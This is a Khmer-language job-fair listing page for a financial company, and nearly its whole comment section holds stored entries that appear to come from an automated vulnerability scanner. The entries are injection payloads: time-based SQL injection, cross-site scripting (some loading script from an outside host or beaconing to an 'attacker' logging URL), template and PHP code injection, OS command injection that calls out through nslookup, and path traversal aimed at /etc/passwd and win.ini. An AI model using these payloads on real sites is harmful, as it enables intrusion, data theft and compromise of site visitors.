ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

ហ្គោលអេហ្វអិកស៍ អ៊ិនវេសម៉ិន
ហ្គោលអេហ្វអិកស៍ អ៊ិនវេសម៉ិន គឺជាក្រុមហ៊ុនហិរញ្ញវត្ថុមួយដែលផ្តល់សេវាកម្មហិរញ្ញវត្ថុដល់បុគ្គលនិងសាជីវកម្មទាំងក្នុងស្រុកនិងអន្តរជាតិ។ យើងប្រឹងប្រែងដើម្បីក្លាយជាអ្នកច្នៃប្រឌិតនិងអ្នកដឹកនាំឧស្សាហកម្មបច្ចេកវិទ្យាចុងក្រោយបំផុតដោយស្មោះត្រង់ចំពោះអត្ថប្រយោជន៏ ដល់អតិថិជនរបស់យើងនិងជំរុញការច្នៃប្រឌិតនិងការប្រសើរបំផុតក្នុងចំណោមបុគ្គលិករបស់យើងទាំងអស់

ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 40

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 125 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 09:54:03


  @@r2c78


 • pHqghUme

  2021-05-06 09:53:58


  1'"


 • pHqghUme

  2021-05-06 09:53:57


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 09:53:36


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 09:53:19


  wRgVfzOH')) OR 412=(SELECT 412 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:53:02


  2ijbX7wi') OR 957=(SELECT 957 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:52:45


  AW83yAVb' OR 891=(SELECT 891 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:52:28


  -1)) OR 160=(SELECT 160 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:52:10


  -5) OR 697=(SELECT 697 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:51:46


  -5 OR 129=(SELECT 129 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:51:24


  eZcl2QtG'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:51:05


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:50:46


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:50:25


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:50:00


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 09:49:44


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 09:49:29


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 09:49:11


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 09:48:46


  -1' OR 2+411-411-1=0+0+0+1 or '8eIzYZY2'='


 • pHqghUme

  2021-05-06 09:48:46


  -1" OR 2+495-495-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 09:48:45


  -1' OR 2+918-918-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 09:48:44


  -1 OR 2+262-262-1=0+0+0+1


 • pHqghUme

  2021-05-06 09:48:43


  -1 OR 2+188-188-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 09:48:41


  GZSN5EOB


 • pHqghUme

  2021-05-06 09:48:18


  1


 • pHqghUme

  2021-05-06 09:47:58


  1


 • @@3ldW7

  2021-05-06 09:47:37


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 09:47:32


  1


 • 1'"

  2021-05-06 09:47:32


  1


 • tcSA1Q1T')) OR 289=(SELECT 289 FROM PG_SLEEP(15))--

  2021-05-06 09:47:18


  1


 • Za0MNuAo') OR 192=(SELECT 192 FROM PG_SLEEP(15))--

  2021-05-06 09:47:01


  1


 • X5ivSv9q' OR 907=(SELECT 907 FROM PG_SLEEP(15))--

  2021-05-06 09:46:49


  1


 • lSTvHpJu'; waitfor delay '0:0:15' --

  2021-05-06 09:46:35


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 09:46:19


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 09:45:58


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 09:45:40


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 09:45:25


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 09:45:02


  1


 • -1' OR 2+852-852-1=0+0+0+1 or 'ELn7asvf'='

  2021-05-06 09:44:40


  1


 • -1" OR 2+708-708-1=0+0+0+1 --

  2021-05-06 09:44:40


  1


 • -1' OR 2+58-58-1=0+0+0+1 --

  2021-05-06 09:44:39


  1


 • -1 OR 2+421-421-1=0+0+0+1

  2021-05-06 09:44:38


  1


 • -1 OR 2+224-224-1=0+0+0+1 --

  2021-05-06 09:44:37


  1


 • VhYDv9Kl

  2021-05-06 09:44:35


  1


 • pHqghUme

  2021-05-06 09:44:09


  1


 • pHqghUme

  2021-05-06 09:43:45


  1


 • pHqghUme

  2021-05-06 09:43:25


  1


 • pHqghUme

  2021-05-06 09:43:21


  1


 • pHqghUme

  2021-05-06 09:43:21


  1


 • pHqghUme

  2021-05-06 09:42:58


  1


 • pHqghUme

  2021-05-06 09:42:39


  1


 • pHqghUme

  2021-05-06 09:42:15


  1


 • pHqghUme

  2021-05-06 09:41:55


  1


 • pHqghUme

  2021-05-06 09:41:39


  1


 • pHqghUme

  2021-05-06 09:41:20


  1


 • pHqghUme

  2021-05-06 09:40:53


  1


 • pHqghUme

  2021-05-06 09:40:31


  1


 • pHqghUme

  2021-05-06 09:40:12


  1<rx9ywN<


 • pHqghUme

  2021-05-06 09:40:09


  1


 • pHqghUme

  2021-05-06 09:40:05


  1<img sRc='http://attacker-9143/log.php?


 • pHqghUme

  2021-05-06 09:40:00


  1<DqquWM x=9632>


 • pHqghUme

  2021-05-06 09:39:53


  1<ifRAme sRc=9054.com></IfRamE>


 • pHqghUme

  2021-05-06 09:39:49


  1<WIRSZM>U4AZF[!+!]</WIRSZM>


 • pHqghUme

  2021-05-06 09:39:44


  1


 • pHqghUme

  2021-05-06 09:39:43


  1


 • pHqghUme

  2021-05-06 09:39:43


  1


 • pHqghUme

  2021-05-06 09:39:43


  1iRBqX <ScRiPt >mjQZ(9131)</ScRiPt>


 • pHqghUme

  2021-05-06 09:39:43


  1


 • pHqghUme

  2021-05-06 09:39:42


  1


 • pHqghUme

  2021-05-06 09:39:41


  1


 • pHqghUme

  2021-05-06 09:39:38


  1<% contenteditable onresize=mjQZ(9093)>


 • pHqghUme

  2021-05-06 09:39:33


  1}body{acu:Expre/**/SSion(mjQZ(9268))}


 • pHqghUme

  2021-05-06 09:39:28


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 09:39:24


  1


 • pHqghUme

  2021-05-06 09:39:22


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 09:39:17


  1<input autofocus onfocus=mjQZ(9821)>


 • pHqghUme

  2021-05-06 09:39:10


  1&lt;ScRiPt&gt;mjQZ(9752)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 09:39:09


  1


 • pHqghUme

  2021-05-06 09:39:03


  1\u003CScRiPt\mjQZ(9595)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 09:38:56


  %31%3C%53%63%52%69%50%74%20%3E%6D%6A%51%5A%289881%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 09:38:54


  1


 • pHqghUme

  2021-05-06 09:38:52


  1<img/src=">" onerror=alert(9983)>


 • pHqghUme

  2021-05-06 09:38:48


  1


 • pHqghUme

  2021-05-06 09:38:47


  1


 • pHqghUme

  2021-05-06 09:38:45


  1<img src=xyz OnErRor=mjQZ(9317)>


 • pHqghUme

  2021-05-06 09:38:37


  1<img src=//xss.bxss.me/t/dot.gif onload=mjQZ(9440)>


 • pHqghUme

  2021-05-06 09:38:33


  1


 • pHqghUme

  2021-05-06 09:38:30


  1<body onload=mjQZ(9490)>


 • pHqghUme

  2021-05-06 09:38:23


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9952'>


 • pHqghUme

  2021-05-06 09:38:18


  1


 • pHqghUme

  2021-05-06 09:38:11


  1<isindex type=image src=1 onerror=mjQZ(9042)>


 • pHqghUme

  2021-05-06 09:38:04


  1


 • pHqghUme

  2021-05-06 09:38:02


  1<ScRiPt >mjQZ(9452)</ScRiPt>


 • pHqghUme

  2021-05-06 09:37:55


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9427></ScRiPt>


 • pHqghUme

  2021-05-06 09:37:50


  1


 • pHqghUme

  2021-05-06 09:37:49


  1<ScRiPt >mjQZ(9298)</ScRiPt>


 • pHqghUme

  2021-05-06 09:37:42


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%6D%6A%51%5A%28%39%38%32%39%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 09:37:36


  1<script>mjQZ(9519)</script>


 • pHqghUme

  2021-05-06 09:37:34


  1


 • pHqghUme

  2021-05-06 09:37:32


  1<WITYKD>DOT81[!+!]</WITYKD>


 • pHqghUme

  2021-05-06 09:37:28


  1<ScRiPt >mjQZ(9747)</ScRiPt>


 • pHqghUme

  2021-05-06 09:37:24


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 09:37:20


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 09:37:19


  1


 • pHqghUme

  2021-05-06 09:37:15


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 09:37:11


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 09:37:02


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 09:36:57


  1


 • pHqghUme

  2021-05-06 09:36:53


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 09:36:42


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 09:36:39


  1


 • pHqghUme

  2021-05-06 09:36:36


  acux10611%C0%BEz1%C0%BCz2a%90bcxuca10611


 • pHqghUme

  2021-05-06 09:36:29


  acu4090%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca4090


 • pHqghUme

  2021-05-06 09:36:19


  19085064


 • pHqghUme

  2021-05-06 09:36:19


  1


 • pHqghUme

  2021-05-06 09:36:10


  '"()&%<acx><ScRiPt >mjQZ(9047)</ScRiPt>


 • pHqghUme

  2021-05-06 09:36:04


  1'"()&%<acx><ScRiPt >mjQZ(9672)</ScRiPt>


 • pHqghUme<5iZVwJ<

  2021-05-06 09:36:00


  1


 • pHqghUme<img sRc='http://attacker-9470/log.php?

  2021-05-06 09:35:57


  1


 • pHqghUme<lkCUUh x=9479>

  2021-05-06 09:35:53


  1


 • pHqghUme

  2021-05-06 09:35:49


  1


 • pHqghUme<ifRAme sRc=9914.com></IfRamE>

  2021-05-06 09:35:47


  1


 • pHqghUme

  2021-05-06 09:35:46


  1


 • pHqghUme

  2021-05-06 09:35:46


  1


 • pHqghUme

  2021-05-06 09:35:45


  1


 • pHqghUme

  2021-05-06 09:35:45


  1


 • pHqghUme

  2021-05-06 09:35:44


  1


 • pHqghUme<WMYO2J>ZQKK6[!+!]</WMYO2J>

  2021-05-06 09:35:43


  1


 • pHqghUmek2ACE <ScRiPt >mjQZ(9816)</ScRiPt>

  2021-05-06 09:35:39


  1


 • pHqghUme<% contenteditable onresize=mjQZ(9791)>

  2021-05-06 09:35:35


  1


 • pHqghUme}body{acu:Expre/**/SSion(mjQZ(9312))}

  2021-05-06 09:35:29


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 09:35:25


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 09:35:20


  1


 • pHqghUme

  2021-05-06 09:35:19


  1


 • pHqghUme<input autofocus onfocus=mjQZ(9062)>

  2021-05-06 09:35:13


  1


 • pHqghUme&lt;ScRiPt&gt;mjQZ(9001)&lt;/sCripT&gt;

  2021-05-06 09:35:04


  1


 • pHqghUme\u003CScRiPt\mjQZ(9566)\u003C/sCripT\u003E

  2021-05-06 09:34:59


  1


 • pHqghUme

  2021-05-06 09:34:55


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%6D%6A%51%5A%289400%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 09:34:53


  1


 • pHqghUme<img/src=">" onerror=alert(9009)>

  2021-05-06 09:34:46


  1


 • pHqghUme<img src=xyz OnErRor=mjQZ(9802)>

  2021-05-06 09:34:41


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=mjQZ(9712)>

  2021-05-06 09:34:33


  1


 • pHqghUme<body onload=mjQZ(9568)>

  2021-05-06 09:34:26


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9667'>

  2021-05-06 09:34:20


  1


 • pHqghUme<isindex type=image src=1 onerror=mjQZ(9040)>

  2021-05-06 09:34:15


  1


 • pHqghUme<ScRiPt >mjQZ(9966)</ScRiPt>

  2021-05-06 09:34:06


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9491></ScRiPt>

  2021-05-06 09:33:59


  1


 • pHqghUme<ScRiPt >mjQZ(9935)</ScRiPt>

  2021-05-06 09:33:53


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%6D%6A%51%5A%28%39%33%34%32%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 09:33:47


  1


 • pHqghUme<script>mjQZ(9955)</script>

  2021-05-06 09:33:42


  1


 • pHqghUme<WMRRL0>RIML2[!+!]</WMRRL0>

  2021-05-06 09:33:36


  1


 • pHqghUme<ScRiPt >mjQZ(9415)</ScRiPt>

  2021-05-06 09:33:29


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 09:33:07


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 09:32:35


  1


 • acx__${98991*97996}__::.x

  2021-05-06 09:32:18


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 09:32:12


  1


 • acx{{98991*97996}}xca

  2021-05-06 09:32:06


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 09:32:00


  1


 • <th:t="${acx}#foreach

  2021-05-06 09:31:46


  1


 • <th:t="${acx}#foreach

  2021-05-06 09:31:46


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 09:31:04


  1


 • acux8816%C0%BEz1%C0%BCz2a%90bcxuca8816

  2021-05-06 09:30:56


  1


 • acu5516%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca5516

  2021-05-06 09:30:33


  1


 • pHqghUme9329358

  2021-05-06 09:30:27


  1


 • '"()&%<acx><ScRiPt >mjQZ(9939)</ScRiPt>

  2021-05-06 09:30:21


  1


 • pHqghUme'"()&%<acx><ScRiPt >mjQZ(9868)</ScRiPt>

  2021-05-06 09:30:16


  1


 • pHqghUme

  2021-05-06 09:30:09


  1


 • pHqghUme

  2021-05-06 09:30:00


  1


 • pHqghUme

  2021-05-06 09:29:52


  1


 • pHqghUme

  2021-05-06 09:29:46


  1


 • pHqghUme

  2021-05-06 09:29:38


  1


 • pHqghUme

  2021-05-06 09:29:31


  1


 • pHqghUme

  2021-05-06 09:29:27


  '"


 • pHqghUme

  2021-05-06 09:29:27


  <!--


 • '"

  2021-05-06 09:29:26


  1


 • <!--

  2021-05-06 09:29:26


  1


 • pHqghUme

  2021-05-06 09:29:25


  1


 • pHqghUme

  2021-05-06 09:29:24


  1


 • pHqghUme

  2021-05-06 09:29:23


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 09:29:23


  1


 • pHqghUme

  2021-05-06 09:29:23


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 09:29:22


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 09:29:22


  1


 • pHqghUme

  2021-05-06 09:29:21


  ';print(md5(31337));$a='


 • pHqghUme

  2021-05-06 09:29:21


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 09:29:20


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • pHqghUme

  2021-05-06 09:29:20


  /xfs.bxss.me


 • '.print(md5(31337)).'

  2021-05-06 09:29:19


  1


 • /xfs.bxss.me

  2021-05-06 09:29:19


  1


 • ${@print(md5(31337))}

  2021-05-06 09:29:18


  1


 • pHqghUme

  2021-05-06 09:29:18


  1


 • pHqghUme

  2021-05-06 09:29:18


  "+"A".concat(70-3).concat(22*4).concat(119).concat(75).concat(99).concat(76)+(require"socket" Socket.gethostbyname("hitko"+"ntqydidx3da40.bxss.me.")[3].to_s)+"


 • ${@print(md5(31337))}\

  2021-05-06 09:29:18


  1


 • pHqghUme

  2021-05-06 09:29:18


  '+'A'.concat(70-3).concat(22*4).concat(97).concat(90).concat(118).concat(74)+(require'socket' Socket.gethostbyname('hitqf'+'zxfqhryk884ce.bxss.me.')[3].to_s)+'


 • pHqghUme

  2021-05-06 09:29:18


  1


 • ";print(md5(31337));$a="

  2021-05-06 09:29:17


  1


 • '+'A'.concat(70-3).concat(22*4).concat(120).concat(69).concat(107).concat(72)+(require'socket' Socket.gethostbyname('hitpw'+'bhlivfrx6367b.bxss.me.')[3].to_s)+'

  2021-05-06 09:29:17


  1


 • "+"A".concat(70-3).concat(22*4).concat(115).concat(75).concat(108).concat(85)+(require"socket" Socket.gethostbyname("hitjm"+"kkowrqjza5b06.bxss.me.")[3].to_s)+"

  2021-05-06 09:29:16


  1


 • ';print(md5(31337));$a='

  2021-05-06 09:29:16


  1


 • pHqghUme

  2021-05-06 09:29:15


  1


 • pHqghUme

  2021-05-06 09:29:15


  1


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 09:29:15


  1


 • pHqghUme

  2021-05-06 09:29:15


  1


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 09:29:15


  1


 • pHqghUme

  2021-05-06 09:29:15


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • pHqghUme

  2021-05-06 09:29:14


  1


 • pHqghUme

  2021-05-06 09:29:14


  1


 • pHqghUme

  2021-05-06 09:29:14


  1


 • pHqghUme

  2021-05-06 09:29:14


  1


 • pHqghUme

  2021-05-06 09:29:14


  1


 • pHqghUme

  2021-05-06 09:29:14


  1


 • pHqghUme

  2021-05-06 09:29:13


  1


 • pHqghUme

  2021-05-06 09:29:12


  1


 • pHqghUme

  2021-05-06 09:29:12


  1


 • pHqghUme

  2021-05-06 09:29:11


  1


 • pHqghUme

  2021-05-06 09:29:11


  bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 09:29:11


  1


 • pHqghUme

  2021-05-06 09:29:10


  HttP://bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 09:29:10


  1


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 09:29:09


  1


 • pHqghUme

  2021-05-06 09:29:09


  1


 • pHqghUme

  2021-05-06 09:29:09


  1


 • bxss.me/t/xss.html?%00

  2021-05-06 09:29:09


  1


 • pHqghUme

  2021-05-06 09:29:08


  1


 • pHqghUme

  2021-05-06 09:29:08


  1


 • pHqghUme

  2021-05-06 09:29:07


  1


 • pHqghUme

  2021-05-06 09:29:07


  1


 • pHqghUme

  2021-05-06 09:29:06


  1


 • pHqghUme

  2021-05-06 09:29:02


  ".gethostbyname(lc("hitum"."hxlfhzyfefb73.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(72).chr(119).chr(86)."


 • pHqghUme

  2021-05-06 09:29:02


  '"()


 • pHqghUme

  2021-05-06 09:29:01


  '.gethostbyname(lc('hitxt'.'qmkknaqibee3d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(67).chr(111).chr(77).'


 • '.gethostbyname(lc('hitjz'.'rtxkmeckc5e3a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(84).chr(119).chr(82).'

  2021-05-06 09:29:00


  1


 • ".gethostbyname(lc("hitid"."tuvmgouh7fd0b.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(77).chr(114).chr(89)."

  2021-05-06 09:29:00


  1


 • pHqghUme

  2021-05-06 09:28:59


  1


 • '"()

  2021-05-06 09:28:58


  1


 • pHqghUme

  2021-05-06 09:28:58


  1


 • pHqghUme

  2021-05-06 09:28:57


  1


 • pHqghUme

  2021-05-06 09:28:56


  1


 • pHqghUme

  2021-05-06 09:28:55


  1&n987743=v975095


 • pHqghUme

  2021-05-06 09:28:54


  1


 • pHqghUme

  2021-05-06 09:28:51


  ^(#$!@#$)(()))******


 • pHqghUme

  2021-05-06 09:28:50


  )


 • pHqghUme&n943501=v999473

  2021-05-06 09:28:50


  1


 • pHqghUme

  2021-05-06 09:28:50


  !(()&&!|*|*|


 • !(()&&!|*|*|

  2021-05-06 09:28:48


  1


 • ^(#$!@#$)(()))******

  2021-05-06 09:28:48


  1


 • pHqghUme

  2021-05-06 09:28:47


  1


 • )

  2021-05-06 09:28:47


  1


 • pHqghUme

  2021-05-06 09:28:46


  1


 • pHqghUme

  2021-05-06 09:28:46


  1


 • pHqghUme

  2021-05-06 09:28:46


  1


 • pHqghUme

  2021-05-06 09:28:45


  1


 • pHqghUme

  2021-05-06 09:28:45


  1


 • pHqghUme

  2021-05-06 09:28:44


  1


 • pHqghUme

  2021-05-06 09:28:44


  1


 • pHqghUme

  2021-05-06 09:28:41


  1


 • UVU3MjRudTM=

  2021-05-06 09:28:39


  1


 • pHqghUme

  2021-05-06 09:28:37


  http://bxss.me/t/fit.txt%3F.jpg


 • pHqghUme

  2021-05-06 09:28:37


  bxss.me


 • pHqghUme

  2021-05-06 09:28:36


  1some_inexistent_file_with_long_name%00.jpg


 • pHqghUme

  2021-05-06 09:28:36


  Http://bxss.me/t/fit.txt


 • bxss.me

  2021-05-06 09:28:35


  1


 • pHqghUme

  2021-05-06 09:28:35


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 09:28:34


  1


 • pHqghUme

  2021-05-06 09:28:34


  `(nslookup hitdprnitsfbk4b244.bxss.me||perl -e "gethostbyname('hitdprnitsfbk4b244.bxss.me')")`


 • Http://bxss.me/t/fit.txt

  2021-05-06 09:28:33


  1


 • pHqghUme

  2021-05-06 09:28:33


  |(nslookup hitlwzzzxmdhybbd6c.bxss.me||perl -e "gethostbyname('hitlwzzzxmdhybbd6c.bxss.me')")


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 09:28:32


  1


 • pHqghUme

  2021-05-06 09:28:31


  1


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 09:28:31


  1


 • pHqghUme

  2021-05-06 09:28:30


  $(nslookup hitwgbrjgivwv907e9.bxss.me||perl -e "gethostbyname('hitwgbrjgivwv907e9.bxss.me')")


 • pHqghUme

  2021-05-06 09:28:30


  1


 • pHqghUme

  2021-05-06 09:28:30


  1


 • pHqghUme

  2021-05-06 09:28:29


  1


 • pHqghUme

  2021-05-06 09:28:29


  |echo fnndqx$()\ jyfnfi\nz^xyu||a #' |echo fnndqx$()\ jyfnfi\nz^xyu||a #|" |echo fnndqx$()\ jyfnfi\nz^xyu||a #


 • pHqghUme

  2021-05-06 09:28:29


  1


 • pHqghUme

  2021-05-06 09:28:29


  (nslookup hitzqyimiqwcw01dd1.bxss.me||perl -e "gethostbyname('hitzqyimiqwcw01dd1.bxss.me')")


 • pHqghUme

  2021-05-06 09:28:29


  1


 • pHqghUme

  2021-05-06 09:28:28


  1


 • pHqghUme

  2021-05-06 09:28:28


  echo keovbn$()\ wahkri\nz^xyu||a #' &echo keovbn$()\ wahkri\nz^xyu||a #|" &echo keovbn$()\ wahkri\nz^xyu||a #


 • pHqghUme

  2021-05-06 09:28:28


  1


 • pHqghUme

  2021-05-06 09:28:28


  &echo xrgvzo$()\ ezcnus\nz^xyu||a #' &echo xrgvzo$()\ ezcnus\nz^xyu||a #|" &echo xrgvzo$()\ ezcnus\nz^xyu||a #


 • pHqghUme

  2021-05-06 09:28:28


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • pHqghUme

  2021-05-06 09:28:27


  1


 • pHqghUme

  2021-05-06 09:28:27


  1


 • |(nslookup hitejnvhwqyhj7c2ab.bxss.me||perl -e "gethostbyname('hitejnvhwqyhj7c2ab.bxss.me')")

  2021-05-06 09:28:25


  1


 • `(nslookup hitlxwgbmgpvb1081b.bxss.me||perl -e "gethostbyname('hitlxwgbmgpvb1081b.bxss.me')")`

  2021-05-06 09:28:25


  1


 • pHqghUme

  2021-05-06 09:28:21


  ${10000384+9999176}


 • pHqghUme

  2021-05-06 09:28:20


  1


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 09:28:20


  1


 • ${10000252+9999535}

  2021-05-06 09:28:20


  1


 • pHqghUme

  2021-05-06 09:28:19


  1


 • pHqghUme

  2021-05-06 09:28:19


  1


 • (nslookup hitzkhuwoyvkaeb84a.bxss.me||perl -e "gethostbyname('hitzkhuwoyvkaeb84a.bxss.me')")

  2021-05-06 09:28:18


  1


 • $(nslookup hityziqpxetmq370d2.bxss.me||perl -e "gethostbyname('hityziqpxetmq370d2.bxss.me')")

  2021-05-06 09:28:18


  1


 • pHqghUme

  2021-05-06 09:28:17


  1<esi:include src="http://bxss.me/rpb.png"/>


 • |echo hhbeck$()\ zrvtcl\nz^xyu||a #' |echo hhbeck$()\ zrvtcl\nz^xyu||a #|" |echo hhbeck$()\ zrvtcl\nz^xyu||a #

  2021-05-06 09:28:17


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 09:28:16


  1


 • &echo whxsen$()\ pbtwls\nz^xyu||a #' &echo whxsen$()\ pbtwls\nz^xyu||a #|" &echo whxsen$()\ pbtwls\nz^xyu||a #

  2021-05-06 09:28:16


  1


 • echo qawtcy$()\ dgwfiv\nz^xyu||a #' &echo qawtcy$()\ dgwfiv\nz^xyu||a #|" &echo qawtcy$()\ dgwfiv\nz^xyu||a #

  2021-05-06 09:28:15


  1


 • pHqghUme

  2021-05-06 09:28:14


  1


 • pHqghUme

  2021-05-06 09:28:14


  1


 • pHqghUme

  2021-05-06 09:28:12


  ../1


 • pHqghUme

  2021-05-06 09:28:11


  1


 • pHqghUme

  2021-05-06 09:28:11


  ../../../../../../../../../../../../../../windows/win.ini


 • pHqghUme

  2021-05-06 09:28:11


  1


 • pHqghUme

  2021-05-06 09:28:10


  1


 • ../pHqghUme

  2021-05-06 09:28:10


  1


 • pHqghUme

  2021-05-06 09:28:10


  1


 • pHqghUme

  2021-05-06 09:28:10


  ../../../../../../../../../../../../../../etc/passwd


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 09:28:09


  1


 • pHqghUme

  2021-05-06 09:28:09


  1


 • pHqghUme

  2021-05-06 09:28:08


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 09:28:08


  1


 • pHqghUme

  2021-05-06 09:28:07


  1


 • pHqghUme

  2021-05-06 09:28:07


  1


 • pHqghUme

  2021-05-06 09:28:06


  1


 • pHqghUme

  2021-05-06 09:28:06


  1


 • pHqghUme

  2021-05-06 09:28:06


  1


 • pHqghUme

  2021-05-06 09:28:06


  1


 • pHqghUme

  2021-05-06 09:28:05


  1


 • pHqghUme

  2021-05-06 09:28:05


  1


 • pHqghUme

  2021-05-06 09:28:05


  1


 • pHqghUme

  2021-05-06 09:28:05


  1


 • pHqghUme

  2021-05-06 09:28:04


  1


 • pHqghUme

  2021-05-06 09:28:04


  1


 • pHqghUme

  2021-05-06 09:28:03


  1


 • pHqghUme

  2021-05-06 09:28:03


  1


 • pHqghUme

  2021-05-06 09:28:03


  1


 • pHqghUme

  2021-05-06 09:28:01


  1


 • pHqghUme

  2021-05-06 09:27:58


  1


 • pHqghUme

  2021-05-06 09:27:50


  1


 • pHqghUme

  2021-05-06 09:27:50


  1


 • pHqghUme

  2021-05-06 09:27:49


  5ADhX5zs


 • pHqghUme

  2021-05-06 09:27:48


  1


 • pHqghUme

  2021-05-06 09:27:48


  1


 • RX02b13K

  2021-05-06 09:27:48


  1


 • pHqghUme

  2021-05-06 09:27:48


  1


 • pHqghUme

  2021-05-06 09:27:47


  1


 • pHqghUme

  2021-05-06 09:27:47


  1


 • pHqghUme

